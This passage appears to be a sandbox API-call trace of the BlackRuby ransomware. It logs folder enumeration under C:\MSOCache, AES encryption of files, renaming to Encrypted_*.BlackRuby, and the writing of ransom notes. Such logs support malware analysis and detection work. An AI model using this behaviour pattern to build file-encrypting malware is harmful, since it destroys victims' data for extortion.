SetErrorMode (uMode=0x0) returned 0x1 [0045.384] CryptAcquireContextW (in: phProv=0x18ed4c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18ed4c*=0x37c4e8) returned 1 [0045.384] GetLastError () returned 0x0 [0045.417] CryptImportKey (in: hProv=0x37c4e8, pbData=0x1bd3324, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x18ed28 | out: phKey=0x18ed28*=0x360ba0) returned 1 [0045.417] GetLastError () returned 0x0 [0045.417] CryptContextAddRef (hProv=0x37c4e8, pdwReserved=0x0, dwFlags=0x0) returned 1 [0045.417] GetLastError () returned 0x0 [0045.422] CryptContextAddRef (hProv=0x37c4e8, pdwReserved=0x0, dwFlags=0x0) returned 1 [0045.423] GetLastError () returned 0x0 [0045.423] CryptDuplicateKey (in: hKey=0x360ba0, pdwReserved=0x0, dwFlags=0x0, phKey=0x18ece4 | out: phKey=0x18ece4*=0x360aa0) returned 1 [0045.423] CryptContextAddRef (hProv=0x37c4e8, pdwReserved=0x0, dwFlags=0x0) returned 1 [0045.423] GetLastError () returned 0x0 [0045.423] CryptSetKeyParam (hKey=0x360aa0, dwParam=0x4, pbData=0x1c00370*=0x1, dwFlags=0x0) returned 1 [0045.423] GetLastError () returned 0x0 [0045.423] CryptSetKeyParam (hKey=0x360aa0, dwParam=0x1, pbData=0x1c0033c, dwFlags=0x0) returned 1 [0045.423] GetLastError () returned 0x0 [0045.423] CryptEncrypt (in: hKey=0x360aa0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1c003b8*, pdwDataLen=0x18ed74*=0x6a0, dwBufLen=0x6a0 | out: pbData=0x1c003b8*, pdwDataLen=0x18ed74*=0x6a0) returned 1 [0045.423] GetLastError () returned 0x0 [0045.423] CryptEncrypt (in: hKey=0x360aa0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1c01124*, pdwDataLen=0x18ed8c*=0x10, dwBufLen=0x10 | out: pbData=0x1c01124*, pdwDataLen=0x18ed8c*=0x10) returned 1 [0045.423] GetLastError () returned 0x0 [0045.423] CryptEncrypt (in: hKey=0x360aa0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1c01154*, pdwDataLen=0x18ed94*=0x0, dwBufLen=0x10 | out: pbData=0x1c01154*, pdwDataLen=0x18ed94*=0x10) returned 1 [0045.423] GetLastError () returned 0x0 [0045.423] CryptDestroyKey (hKey=0x360ba0) returned 1 [0045.423] CryptReleaseContext (hProv=0x37c4e8, dwFlags=0x0) returned 1 [0045.423] CryptReleaseContext (hProv=0x37c4e8, dwFlags=0x0) returned 1 [0045.423] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0019-0409-0000-0000000FF1CE}-C\\PublisherMUI.xml", nBufferLength=0x105, lpBuffer=0x18e830, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0019-0409-0000-0000000FF1CE}-C\\PublisherMUI.xml", lpFilePart=0x0) returned 0x4f [0045.423] GetLastError () returned 0x0 [0045.423] SetErrorMode (uMode=0x1) returned 0x0 [0045.423] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0019-0409-0000-0000000FF1CE}-C\\PublisherMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0019-0409-0000-0000000ff1ce}-c\\publishermui.xml"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0045.424] GetLastError () returned 0xb7 [0045.424] GetFileType (hFile=0x184) returned 0x1 [0045.424] SetErrorMode (uMode=0x0) returned 0x1 [0045.424] GetFileType (hFile=0x184) returned 0x1 [0045.426] CloseHandle (hObject=0x184) returned 1 [0045.426] GetLastError () returned 0xb7 [0045.426] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0019-0409-0000-0000000FF1CE}-C\\PublisherMUI.xml", nBufferLength=0x105, lpBuffer=0x18e954, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0019-0409-0000-0000000FF1CE}-C\\PublisherMUI.xml", lpFilePart=0x0) returned 0x4f [0045.426] GetLastError () returned 0xb7 [0045.426] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0019-0409-0000-0000000FF1CE}-C\\Encrypted_efKHAmSqExvK3oyV7XDHe6cEqqep86tXWDAOCM3FRtu6K.BlackRuby", nBufferLength=0x105, lpBuffer=0x18e954, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0019-0409-0000-0000000FF1CE}-C\\Encrypted_efKHAmSqExvK3oyV7XDHe6cEqqep86tXWDAOCM3FRtu6K.BlackRuby", lpFilePart=0x0) returned 0x80 [0045.426] GetLastError () returned 0xb7 [0045.426] SetErrorMode (uMode=0x1) returned 0x0 [0045.426] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0019-0409-0000-0000000FF1CE}-C\\PublisherMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0019-0409-0000-0000000ff1ce}-c\\publishermui.xml"), fInfoLevelId=0x0, lpFileInformation=0x18edd4 | out: lpFileInformation=0x18edd4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x2e836200, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x2e836200, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0x2346d560, ftLastWriteTime.dwHighDateTime=0x1d39df7, nFileSizeHigh=0x0, nFileSizeLow=0x6b0)) returned 1 [0045.426] GetLastError () returned 0xb7 [0045.426] SetErrorMode (uMode=0x0) returned 0x1 [0045.426] MoveFileW (lpExistingFileName="C:\\MSOCache\\All Users\\{90140000-0019-0409-0000-0000000FF1CE}-C\\PublisherMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0019-0409-0000-0000000ff1ce}-c\\publishermui.xml"), lpNewFileName="C:\\MSOCache\\All Users\\{90140000-0019-0409-0000-0000000FF1CE}-C\\Encrypted_efKHAmSqExvK3oyV7XDHe6cEqqep86tXWDAOCM3FRtu6K.BlackRuby" (normalized: "c:\\msocache\\all users\\{90140000-0019-0409-0000-0000000ff1ce}-c\\encrypted_efkhamsqexvk3oyv7xdhe6ceqqep86txwdaocm3frtu6k.blackruby")) returned 1 [0045.426] GetLastError () returned 0xb7 [0045.427] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0019-0409-0000-0000000FF1CE}-C\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e838, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0019-0409-0000-0000000FF1CE}-C\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x57 [0045.427] GetLastError () returned 0xb7 [0045.427] SetErrorMode (uMode=0x1) returned 0x0 [0045.427] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0019-0409-0000-0000000FF1CE}-C\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\msocache\\all users\\{90140000-0019-0409-0000-0000000ff1ce}-c\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0045.427] GetLastError () returned 0x5 [0045.428] SetErrorMode (uMode=0x0) returned 0x1 [0045.428] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0019-0409-0000-0000000FF1CE}-C\\PubLR.cab", nBufferLength=0x105, lpBuffer=0x18e98c, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0019-0409-0000-0000000FF1CE}-C\\PubLR.cab", lpFilePart=0x0) returned 0x48 [0045.428] GetLastError () returned 0x5 [0045.428] SetErrorMode (uMode=0x1) returned 0x0 [0045.428] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0019-0409-0000-0000000FF1CE}-C\\PubLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-0019-0409-0000-0000000ff1ce}-c\\publr.cab"), fInfoLevelId=0x0, lpFileInformation=0x1c20aac | out: lpFileInformation=0x1c20aac*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x190e3800, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x190e3800, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0x3bf894b0, ftLastWriteTime.dwHighDateTime=0x1d2da19, nFileSizeHigh=0x0, nFileSizeLow=0x97e79c)) returned 1 [0045.428] GetLastError () returned 0x5 [0045.428] SetErrorMode (uMode=0x0) returned 0x1 [0045.428] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0019-0409-0000-0000000FF1CE}-C\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e838, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0019-0409-0000-0000000FF1CE}-C\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x57 [0045.428] GetLastError () returned 0x5 [0045.428] SetErrorMode (uMode=0x1) returned 0x0 [0045.428] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0019-0409-0000-0000000FF1CE}-C\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\msocache\\all users\\{90140000-0019-0409-0000-0000000ff1ce}-c\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0045.429] GetLastError () returned 0x5 [0045.429] SetErrorMode (uMode=0x0) returned 0x1 [0045.429] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0019-0409-0000-0000000FF1CE}-C\\Setup.xml", nBufferLength=0x105, lpBuffer=0x18e98c, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0019-0409-0000-0000000FF1CE}-C\\Setup.xml", lpFilePart=0x0) returned 0x48 [0045.429] GetLastError () returned 0x5 [0045.430] SetErrorMode (uMode=0x1) returned 0x0 [0045.430] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0019-0409-0000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0019-0409-0000-0000000ff1ce}-c\\setup.xml"), fInfoLevelId=0x0, lpFileInformation=0x1c3e884 | out: lpFileInformation=0x1c3e884*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x2e836200, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x2e836200, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0x3d39ee50, ftLastWriteTime.dwHighDateTime=0x1d2da19, nFileSizeHigh=0x0, nFileSizeLow=0x648)) returned 1 [0045.430] GetLastError () returned 0x5 [0045.430] SetErrorMode (uMode=0x0) returned 0x1 [0045.431] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0019-0409-0000-0000000FF1CE}-C\\Setup.xml", nBufferLength=0x105, lpBuffer=0x18e954, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0019-0409-0000-0000000FF1CE}-C\\Setup.xml", lpFilePart=0x0) returned 0x48 [0045.431] GetLastError () returned 0x5 [0045.431] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0019-0409-0000-0000000FF1CE}-C\\Setup.xml", nBufferLength=0x105, lpBuffer=0x18e828, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0019-0409-0000-0000000FF1CE}-C\\Setup.xml", lpFilePart=0x0) returned 0x48 [0045.431] GetLastError () returned 0x5 [0045.431] SetErrorMode (uMode=0x1) returned 0x0 [0045.431] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0019-0409-0000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0019-0409-0000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0045.431] GetLastError () returned 0x0 [0045.431] GetFileType (hFile=0x184) returned 0x1 [0045.431] SetErrorMode (uMode=0x0) returned 0x1 [0045.431] GetFileType (hFile=0x184) returned 0x1 [0045.431] GetFileSize (in: hFile=0x184, lpFileSizeHigh=0x18eddc | out: lpFileSizeHigh=0x18eddc*=0x0) returned 0x648 [0045.431] GetLastError () returned 0x0 [0045.431] ReadFile (in: hFile=0x184, lpBuffer=0x1c40bbc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18ed84, lpOverlapped=0x0 | out: lpBuffer=0x1c40bbc*, lpNumberOfBytesRead=0x18ed84*=0x648, lpOverlapped=0x0) returned 1 [0045.438] GetLastError () returned 0x0 [0045.438] CloseHandle (hObject=0x184) returned 1 [0045.438] GetLastError () returned 0x0 [0045.438] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0019-0409-0000-0000000FF1CE}-C\\Setup.xml", nBufferLength=0x105, lpBuffer=0x18e938, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0019-0409-0000-0000000FF1CE}-C\\Setup.xml", lpFilePart=0x0) returned 0x48 [0045.438] GetLastError () returned 0x0 [0045.438] SetErrorMode (uMode=0x1) returned 0x0 [0045.438] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0019-0409-0000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0019-0409-0000-0000000ff1ce}-c\\setup.xml"), fInfoLevelId=0x0, lpFileInformation=0x18edec | out: lpFileInformation=0x18edec*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x2e836200, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x2e836200, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0x3d39ee50, ftLastWriteTime.dwHighDateTime=0x1d2da19, nFileSizeHigh=0x0, nFileSizeLow=0x648)) returned 1 [0045.438] GetLastError () returned 0x0 [0045.438] SetErrorMode (uMode=0x0) returned 0x1 [0045.449] CryptImportKey (in: hProv=0x37c680, pbData=0x1c9c5dc, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x18ed28 | out: phKey=0x18ed28*=0x360d60) returned 1 [0045.449] GetLastError () returned 0x0 [0045.449] CryptContextAddRef (hProv=0x37c680, pdwReserved=0x0, dwFlags=0x0) returned 1 [0045.449] GetLastError () returned 0x0 [0045.454] CryptContextAddRef (hProv=0x37c680, pdwReserved=0x0, dwFlags=0x0) returned 1 [0045.454] GetLastError () returned 0x0 [0045.454] CryptDuplicateKey (in: hKey=0x360d60, pdwReserved=0x0, dwFlags=0x0, phKey=0x18ece4 | out: phKey=0x18ece4*=0x360da0) returned 1 [0045.454] CryptContextAddRef (hProv=0x37c680, pdwReserved=0x0, dwFlags=0x0) returned 1 [0045.454] GetLastError () returned 0x0 [0045.454] CryptSetKeyParam (hKey=0x360da0, dwParam=0x4, pbData=0x1cc9628*=0x1, dwFlags=0x0) returned 1 [0045.454] GetLastError () returned 0x0 [0045.454] CryptSetKeyParam (hKey=0x360da0, dwParam=0x1, pbData=0x1cc95f4, dwFlags=0x0) returned 1 [0045.455] GetLastError () returned 0x0 [0045.455] CryptEncrypt (in: hKey=0x360da0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1cc9670*, pdwDataLen=0x18ed74*=0x740, dwBufLen=0x740 | out: pbData=0x1cc9670*, pdwDataLen=0x18ed74*=0x740) returned 1 [0045.455] GetLastError () returned 0x0 [0045.455] CryptEncrypt (in: hKey=0x360da0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1cca51c*, pdwDataLen=0x18ed8c*=0x10, dwBufLen=0x10 | out: pbData=0x1cca51c*, pdwDataLen=0x18ed8c*=0x10) returned 1 [0045.455] GetLastError () returned 0x0 [0045.455] CryptEncrypt (in: hKey=0x360da0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1cca54c*, pdwDataLen=0x18ed94*=0x0, dwBufLen=0x10 | out: pbData=0x1cca54c*, pdwDataLen=0x18ed94*=0x10) returned 1 [0045.455] GetLastError () returned 0x0 [0045.455] CryptDestroyKey (hKey=0x360d60) returned 1 [0045.455] CryptReleaseContext (hProv=0x37c680, dwFlags=0x0) returned 1 [0045.455] CryptReleaseContext (hProv=0x37c680, dwFlags=0x0) returned 1 [0045.455] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0019-0409-0000-0000000FF1CE}-C\\Setup.xml", nBufferLength=0x105, lpBuffer=0x18e830, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0019-0409-0000-0000000FF1CE}-C\\Setup.xml", lpFilePart=0x0) returned 0x48 [0045.455] GetLastError () returned 0x0 [0045.455] SetErrorMode (uMode=0x1) returned 0x0 [0045.456] GetFileType (hFile=0x184) returned 0x1 [0045.456] GetFileType (hFile=0x184) returned 0x1 [0045.457] MoveFileW (lpExistingFileName="C:\\MSOCache\\All Users\\{90140000-0019-0409-0000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0019-0409-0000-0000000ff1ce}-c\\setup.xml"), lpNewFileName="C:\\MSOCache\\All Users\\{90140000-0019-0409-0000-0000000FF1CE}-C\\Encrypted_RWMVFp3eZaceUiKGFnPWB33q5FmoxRGRhcCJEPjK.BlackRuby" (normalized: "c:\\msocache\\all users\\{90140000-0019-0409-0000-0000000ff1ce}-c\\encrypted_rwmvfp3ezaceuikgfnpwb33q5fmoxrgrhccjepjk.blackruby")) returned 1 [0045.457] GetLastError () returned 0xb7 [0045.459] SetErrorMode (uMode=0x0) returned 0x1 [0045.459] FindFirstFileW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-001A-0409-0000-0000000FF1CE}-C\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360d60 [0045.464] GetLastError () returned 0x5 [0045.464] FindNextFileW (in: hFindFile=0x360d60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0045.464] GetLastError () returned 0x5 [0045.464] FindNextFileW (in: hFindFile=0x360d60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0045.464] GetLastError () returned 0x5 [0045.465] FindNextFileW (in: hFindFile=0x360d60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0045.465] GetLastError () returned 0x5 [0045.465] FindNextFileW (in: hFindFile=0x360d60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0045.465] GetLastError () returned 0x5 [0045.465] FindNextFileW (in: hFindFile=0x360d60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0045.465] GetLastError () returned 0x5 [0045.465] FindNextFileW (in: hFindFile=0x360d60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0045.465] GetLastError () returned 0x12 [0045.465] FindClose (in: hFindFile=0x360d60 | out: hFindFile=0x360d60) returned 1 [0045.466] SetErrorMode (uMode=0x0) returned 0x1 [0045.466] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-001A-0409-0000-0000000FF1CE}-C", nBufferLength=0x105, lpBuffer=0x18e8d8, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-001A-0409-0000-0000000FF1CE}-C", lpFilePart=0x0) returned 0x3e [0045.466] GetLastError () returned 0x12 [0045.466] SetErrorMode (uMode=0x1) returned 0x0 [0045.466] FindFirstFileW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-001A-0409-0000-0000000FF1CE}-C\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360d60 [0045.467] GetLastError () returned 0x12 [0045.467] FindNextFileW (in: hFindFile=0x360d60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0045.467] GetLastError () returned 0x12 [0045.467] FindNextFileW (in: hFindFile=0x360d60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0045.467] GetLastError () returned 0x12 [0045.467] FindNextFileW (in: hFindFile=0x360d60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0045.467] GetLastError () returned 0x12 [0045.467] FindNextFileW (in: hFindFile=0x360d60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0045.467] GetLastError () returned 0x12 [0045.468] FindNextFileW (in: hFindFile=0x360d60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0045.468] GetLastError () returned 0x12 [0045.468] FindNextFileW (in: hFindFile=0x360d60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0045.468] GetLastError () returned 0x12 [0045.468] FindClose (in: hFindFile=0x360d60 | out: hFindFile=0x360d60) returned 1 [0045.469] SetErrorMode (uMode=0x0) returned 0x1 [0045.469] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-001A-0409-0000-0000000FF1CE}-C\\OutlkLR.cab", nBufferLength=0x105, lpBuffer=0x18e98c, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-001A-0409-0000-0000000FF1CE}-C\\OutlkLR.cab", lpFilePart=0x0) returned 0x4a [0045.469] GetLastError () returned 0x12 [0045.469] SetErrorMode (uMode=0x1) returned 0x0 [0045.469] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-001A-0409-0000-0000000FF1CE}-C\\OutlkLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-001a-0409-0000-0000000ff1ce}-c\\outlklr.cab"), fInfoLevelId=0x0, lpFileInformation=0x1cebabc | out: lpFileInformation=0x1cebabc*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x157ab100, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x157ab100, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0x365fa0c0, ftLastWriteTime.dwHighDateTime=0x1d2da19, nFileSizeHigh=0x0, nFileSizeLow=0xe20206)) returned 1 [0045.470] GetLastError () returned 0x12 [0045.470] SetErrorMode (uMode=0x0) returned 0x1 [0045.471] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-001A-0409-0000-0000000FF1CE}-C\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e838, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-001A-0409-0000-0000000FF1CE}-C\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x57 [0045.471] GetLastError () returned 0x12 [0045.471] SetErrorMode (uMode=0x1) returned 0x0 [0045.471] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-001A-0409-0000-0000000FF1CE}-C\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\msocache\\all users\\{90140000-001a-0409-0000-0000000ff1ce}-c\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0045.471] GetLastError () returned 0x0 [0045.471] GetFileType (hFile=0x184) returned 0x1 [0045.471] SetErrorMode (uMode=0x0) returned 0x1 [0045.471] GetFileType (hFile=0x184) returned 0x1 [0045.471] WriteFile (in: hFile=0x184, lpBuffer=0x1d0797c*, nNumberOfBytesToWrite=0x18da, lpNumberOfBytesWritten=0x18ed98, lpOverlapped=0x0 | out: lpBuffer=0x1d0797c*, lpNumberOfBytesWritten=0x18ed98*=0x18da, lpOverlapped=0x0) returned 1 [0045.472] GetLastError () returned 0x0 [0045.472] CloseHandle (hObject=0x184) returned 1 [0045.472] GetLastError () returned 0x0 [0045.472] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-001A-0409-0000-0000000FF1CE}-C\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e960, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-001A-0409-0000-0000000FF1CE}-C\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x57 [0045.472] GetLastError () returned 0x0 [0045.472] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-001A-0409-0000-0000000FF1CE}-C\\HOW-TO-DECRYPT-FILES.txt", dwFileAttributes=0x1) returned 1 [0045.472] GetLastError () returned 0x0 [0045.472] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-001A-0409-0000-0000000FF1CE}-C\\OutlookMUI.msi", nBufferLength=0x105, lpBuffer=0x18e98c, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-001A-0409-0000-0000000FF1CE}-C\\OutlookMUI.msi", lpFilePart=0x0) returned 0x4d [0045.472] GetLastError () returned 0x0 [0045.473] SetErrorMode (uMode=0x1) returned 0x0 [0045.473] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-001A-0409-0000-0000000FF1CE}-C\\OutlookMUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-001a-0409-0000-0000000ff1ce}-c\\outlookmui.msi"), fInfoLevelId=0x0, lpFileInformation=0x1d09688 | out: lpFileInformation=0x1d09688*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x1f041900, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x1f041900, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0x365d56d0, ftLastWriteTime.dwHighDateTime=0x1d2da19, nFileSizeHigh=0x0, nFileSizeLow=0x204800)) returned 1 [0045.473] GetLastError () returned 0x0 [0045.473] SetErrorMode (uMode=0x0) returned 0x1 [0045.473] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-001A-0409-0000-0000000FF1CE}-C\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e838, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-001A-0409-0000-0000000FF1CE}-C\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x57 [0045.473] GetLastError () returned 0x0 [0045.473] SetErrorMode (uMode=0x1) returned 0x0 [0045.473] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-001A-0409-0000-0000000FF1CE}-C\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\msocache\\all users\\{90140000-001a-0409-0000-0000000ff1ce}-c\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0045.473] GetLastError () returned 0x5 [0045.475] SetErrorMode (uMode=0x0) returned 0x1 [0045.475] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-001A-0409-0000-0000000FF1CE}-C\\OutlookMUI.xml", nBufferLength=0x105, lpBuffer=0x18e98c, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-001A-0409-0000-0000000FF1CE}-C\\OutlookMUI.xml", lpFilePart=0x0) returned 0x4d [0045.475] GetLastError () returned 0x5 [0045.475] SetErrorMode (uMode=0x1) returned 0x0 [0045.475] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-001A-0409-0000-0000000FF1CE}-C\\OutlookMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-001a-0409-0000-0000000ff1ce}-c\\outlookmui.xml"), fInfoLevelId=0x0, lpFileInformation=0x1d27780 | out: lpFileInformation=0x1d27780*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x2d523500, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x2d523500, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0x365d56d0, ftLastWriteTime.dwHighDateTime=0x1d2da19, nFileSizeHigh=0x0, nFileSizeLow=0xc72)) returned 1 [0045.475] GetLastError () returned 0x5 [0045.475] SetErrorMode (uMode=0x0) returned 0x1 [0045.476] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-001A-0409-0000-0000000FF1CE}-C\\OutlookMUI.xml", nBufferLength=0x105, lpBuffer=0x18e954, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-001A-0409-0000-0000000FF1CE}-C\\OutlookMUI.xml", lpFilePart=0x0) returned 0x4d [0045.476] GetLastError () returned 0x5 [0045.476] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-001A-0409-0000-0000000FF1CE}-C\\OutlookMUI.xml", nBufferLength=0x105, lpBuffer=0x18e828, lpFilePart=0x0 | out: 